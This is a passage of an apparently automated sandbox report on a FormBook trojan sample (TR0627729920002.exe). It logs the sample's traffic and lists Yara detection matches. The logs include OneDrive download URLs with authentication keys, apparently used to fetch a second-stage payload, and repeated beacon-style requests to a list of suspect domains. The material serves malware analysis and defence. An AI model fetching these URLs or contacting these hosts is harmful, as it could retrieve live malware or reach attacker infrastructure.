r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: global trafficHTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: lValiHost: onedrive.live.com
            Source: global trafficHTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: Host: onedrive.live.comCookie: E=P:BF1MgWl52og=:F+xq8Gts1vRy7++nYQKKT1+BcfBw1F8nnh1g/tKvTnE=:F; xid=bd1d4f9d-8eae-45b4-81c8-541862284c86&&RD00155D99AC6F&264; xidseq=1; wla42=
            Source: global trafficHTTP traffic detected: GET /y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1User-Agent: lValiHost: 2q5ira.ph.files.1drv.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 HTTP/1.1User-Agent: Host: 2q5ira.ph.files.1drv.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: lValiHost: onedrive.live.comCookie: wla42=
            Source: global trafficHTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1User-Agent: 6Host: onedrive.live.comCookie: wla42=; E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; xidseq=1
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1Host: www.meigsbuilds.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1Host: www.naturathome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1Host: www.nutricognition.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1Host: www.designgamagazine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1Host: www.kidsfundoor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1Host: www.empireapothecary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1Host: www.trendiddas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1Host: www.trisuaka.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1Host: www.nomaxdic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
            Source: Jwjxmakrv.exe, 00000008.00000002.323528611.00000000007FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: TR0627729920002.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
